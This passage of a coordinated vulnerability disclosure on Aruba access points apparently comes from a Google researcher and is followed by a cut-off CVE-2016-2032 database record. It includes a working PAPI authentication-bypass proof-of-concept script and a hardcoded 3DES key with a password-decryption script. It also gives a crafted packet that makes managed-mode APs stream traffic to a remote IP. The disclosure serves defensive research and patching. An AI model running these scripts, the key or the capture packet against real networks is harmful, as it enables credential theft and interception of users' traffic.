$ openssl x509 -in cpprivkey.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 121426 (0x1da52) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL, CN=GeoTrust DV SSL CA Validity Not Before: May 11 01:22:10 2011 GMT Not After : Aug 11 04:40:59 2017 GMT Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF, C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated - QuickSSL(R) Premium, CN=securelogin.arubanetworks.com [...]

$ openssl rsa -in cpprivkey.pem -check RSA key ok writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA…. [...] -----END RSA PRIVATE KEY-----

20. AP: Potential signature private key

A potential SSL key was found under the path /etc/sig.key. Based on the header (3082xxxx[02,03]82), the file looks like a SSL key in DER format:

$ xxd etc/sig.key 00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q....

It was not possible to decode the key. Therefore it's not 100% clear if is an actual key or just a garbaged file.

21. AP: PAPI Endpoints exposed to all interfaces

The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore it is reachable via wired and wireless connections to the AP. This increases the potential attack surface.

# netstat -nlu | grep :82 udp 0 0 :::8209 ::: udp 0 0 :::8211 :::

Additionally the local ACL table of the AP contains a default firewall rule, permitting any traffic to udp/8209-8211, overwriting any manually set ACL to block access to PAPI:

00:0b:86:XX:XX:XX# show datapath acl 106 Datapath ACL 106 Entries

Flags: P - permit, L - log, E - established, M/e - MAC/etype filter S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror I - Invert SA, i - Invert DA, H - high prio, O - set prio, C - Classify Media A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6 K - App Throttle, d - Domain DA

1: any any 17 0-65535 8209-8211 P4 [...] 12: any any any P4 00:0b:86:XX:XX:XX#

22. AP: PAPI Endpoint does not validate MD5 signatures

MD5 signature validation for incoming PAPI packets is disabled on the AP:

# ps | grep msgHandler 1988 root 508 S < /aruba/bin/msgHandler -n

# /aruba/bin/msgHandler -h usage: msgHandler [-d] [-n] -d = enable debug prints. -n = disable md5 signatures. -g = disable garbling.

The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5 signature validation:

# grep msgH /aruba/bin/nanny_list RESTART /aruba/bin/msgHandler -n

23. AP: PAPI protocol encrypted with weak encryption algorithm

PAPI packets sent to an AP contain an encrypted payload. The encryption seems to replace the MD5 signature check as described in #4 and used when PAPI is sent from AP to AMP. This might also explain why the PAPI endpoint runs with disabled MD5 signature verification on the AP (see #22).

The following example shows an encrypted PAPI packet for the command "show version" as received by the AP:

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ...........

Important parts of the above packet:

7f 00 00 01 Destination IP (127.0.0.1) 0a 00 00 01 Source IP (10.0.0.1) 3b 60 Destination Port (15200) 3b 7e Source Port (15230) 97 93 93 93-EOF Encrypted PAPI payload

Comparison of the above packet with a typical PAPI packet that is sent from the AP to the AMP quickly highlights the missing 0x00 that are used to pad certain fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which is a clear indication that the payload is "encrypted" with a 1 byte XOR. As XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore discloses the key used and use of the weak XOR algorithm:

0x00: 00000000

^ 0x93: 10010011 ================ 10010011 (0x93)

The following shows the above PAPI packet for "show version" with its payload decrypted:

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version.

(The string starting with "zxr..." is a HTTP session ID, see #25 on details how to bypass this).

An example Python function for en-/decrypting PAPI payloads could look like this:

def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s])

24. AP: PAPI protocol authentication bypass

Besides it's typical use between different Aruba devices, PAPI is also used as an inter-process communication (IPC) mechanism between the CGI based web frontend and the backend processes on the AP. Certain commands that can be sent via PAPI are only supposed to be used via this IPC interface and not from an external source. Besides the weak "encryption" that is described in #23, some PAPI packets contain a HTTP session ID (SID), that matches the SID issued at login to the web frontend.

Example IPC packet (payload decrypted as shown in #23):

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a .

The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that indicates the length of the 20 byte SID. If the session is expired or an invalid session is specified, the packet is rejected by the PAPI endpoint (msgHandler).

Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore allows unauthenticated PAPI communication with the AP.

Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for readability):

0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a

Using the above example, it is possible to request the system configuration from an AP, bypassing all authentication methods.

If the above packet is sent using IPC from the webfrontend cgi to the backend, (localhost) the reply looks like follows:

msg_ref 303 /tmp/.cli_msg_SW9iVE

The cgi binary then reads this file and renders the content in the HTTP reply. If the PAPI packet comes from an external address (instead of localhost) the reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:

msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh

Access to this file does not require authentication which raises the severity of this vulnerability significantly.

The following Python script is a proof of concept for this vulnerability, sending a "show configuration" packet to an AP with the IP address 10.0.0.26:

import socket def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) header = ( '\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13' '\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ) payload = ( # show configuration '\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06' '\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61' '\x74\x69\x6f\x6e\x0a' ) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', 1337)) sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211)) buff = sock.recvfrom(4096) print aruba_encrypt(buff[0])

Executing the above PoC:

# python arupapi.py [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh

Downloading the file referenced by the reply returns the full AP configuration, including all users, passwords and settings (no auth is required on the HTTP request either):

# curl -Lk http://10.0.0.26/.cli_msg_n011xh version 6.4.2.0-4.1.1 virtual-controller-country XX virtual-controller-key b49ffREMOVED name instant-XX:XX:XX terminal-access clock timezone none 00 00 rf-band all [...] mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa [...] (full configuration file continues)

For APs running in "managed mode", the above shown exploit does not work. The reason for that is, that these APs don't provide a web server and have only a limited set of commands that can be executed via PAPI.

Additionally, APs in managed mode do not seem to use the XOR based "encryption" or MD5 checksums - there was no authentication/encryption found at all.

One interesting payload for APs in "managed mode" using the limited subset of available commands is the ability to capture traffic and send it to a remote endpoint via UDP. The example command on the controller would be:

(aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1 100.105.134.45 1337 0 radio 0

This command would send all traffic of AP 192.168.0.1 from the first radio interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet would look like this:

0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se 0140 63 61 00 00 04 72 6f 6f 74 ca...root

When sending this packet to an AP running in managed mode, it confirms the command and starts sending traffic to the specified host:

[...]1

25. AP: Broadcast with detailed system information (LLDP)

Aruba APs broadcast detailed system and version information to the wired networks via LLDP (Link Layer Discovery Protocol).

0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0. 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... 00a0 12 0f 04 06 76 00 00 ....v..

The broadcast packet contains the APs MAC address, model number and exact firmware version.This detailed information could aid an attacker to easily find and identify potential targets for known vulnerabilities.

26. AP: User passwords are encrypted with a static key

Based on the vulnerability shown in #24 which potentially discloses the password hashes of AP user accounts, the implemented hashing algorithm was tested. CVE-2014-7299 describes the password hashes as "encrypted password hashes". The following line shows the mgmt-user configuration for the user "admin" with password "admin":

mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa

Some testing with various passwords and especially password lengths showed that the passwords are actually encrypted and not hashed (as hash algorithms produce the same length output for different length input):

f9ac59cd431e174fb07539a8a811a1aa # admin d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin

The encryption algorithm used for the above passwords turned out to be 3DES in CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password. The following Python script can be used to decrypt the above hashes:

import pyDes hashes = ( 'f9ac59cd431e174fb07539a8a811a1aa', # admin 'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin ) key = ( '\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92' '\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03' ) for h in hashes: d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00') print h, '=>', d.decrypt(h.decode('hex')[8:])

Mitigation

Aruba released three advisories, related to the issues reported here:

http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt

Following the resolution advises given in those advisories is strongly recommended. These advisories are also available on the Aruba security bulletin:

http://www.arubanetworks.com/support-services/security-bulletins/

For the vulnerabilities related to PAPI, Aruba has made the following document available:

http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf

This doc gives several advises how to remediate the PAPI related vulnerabilities. An update fixing the issues is announced for Q3/2016. For further information there is also a discussion thread in Aruba's Airheads Community Forum:

http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840

Author

The vulnerabilities were discovered by Sven Blumenstein from Google Security Team.

Timeline

2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day disclosure deadline (2016/04/22). 2016/01/22 - Aruba acknowledges report and starts working on the issues. 2016/02/01 - Asking Aruba for ETA on detailed feedback. 2016/02/03 - Detailed feedback for all reported vulnerabilities received. 2016/02/16 - Answered several questions from the feedback, asked Aruba for patch ETA. 2016/02/29 - Pinged for patch ETA. 2016/03/08 - Pinged for patch ETA. 2016/03/12 - Received detailed list with approx. ETA for patch releases and current status. 2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. 2016/03/24 - Asked Aruba for exact patch release dates. 2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch update for 2016/04/30 (past 90 day deadline). 2016/04/14 - 14 day grace period for disclosure was granted, according to the disclosure policy. New disclosure date was set to 2016/05/06. 2016/05/02 - Asking for status of still unreleased 'end of April' update. 2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace period). 2016/05/03 - Aruba released three advisories on http://www.arubanetworks.com/support-services/security-bulletins/ 2016/05/06 - Public disclosure

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1252",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "aruba instant",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "4.2.3.1"
      },
      {
        "model": "arubaos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "*"
      },
      {
        "model": "aruba instant",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "4.1.3.0"
      },
      {
        "model": "airwave",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": null
      },
      {
        "model": "airwave",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "arubanetworks",
        "version": "8.2.0.0"
      },
      {
        "model": "airwave network management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "aruba",
        "version": "8.2"
      },
      {
        "model": "instant",
        "scope": null,
        "trust": 0.8,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "arubaos",
        "scope": null,
        "trust": 0.8,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.1.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.1.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.7"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.3"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.26"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.23"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.18"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.17"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.2.11"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.30"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.29"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1.24"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.5.6.24"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.5.6.0"
      },
      {
        "model": "networks arubaos rn3.1.12",
        "scope": null,
        "trust": 0.3,
        "vendor": "aruba",
        "version": null
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.4"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.13"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.1"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.0.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.1.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "2.0"
      },
      {
        "model": "networks arubaos rn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "1.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.1.2.6"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.1.2.4"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0.2.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0.1.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "6.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.4.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.3.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.3.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.2.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.2.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "5.0.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.4.2"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.3.1"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.2.6"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.4.2.0"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.9"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.8"
      },
      {
        "model": "networks arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "aruba",
        "version": "3.3.3.10"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "8.2.0.0",
                "versionStartIncluding": "",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:4.2.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sven Blumenstein from Google Security Team.",
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-2032",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-2032",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-009617",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-2032",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
